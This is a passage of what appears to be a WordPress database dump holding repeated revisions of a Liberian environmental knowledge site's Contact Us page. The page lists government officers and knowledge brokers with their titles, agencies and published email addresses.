alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 10:14:18','2021-03-29 10:14:18','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3656,42,'2021-03-29 11:21:11','2021-03-29 11:21:11','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 11:21:11','2021-03-29 11:21:11','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3657,42,'2021-03-29 11:21:11','2021-03-29 11:21:11','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" 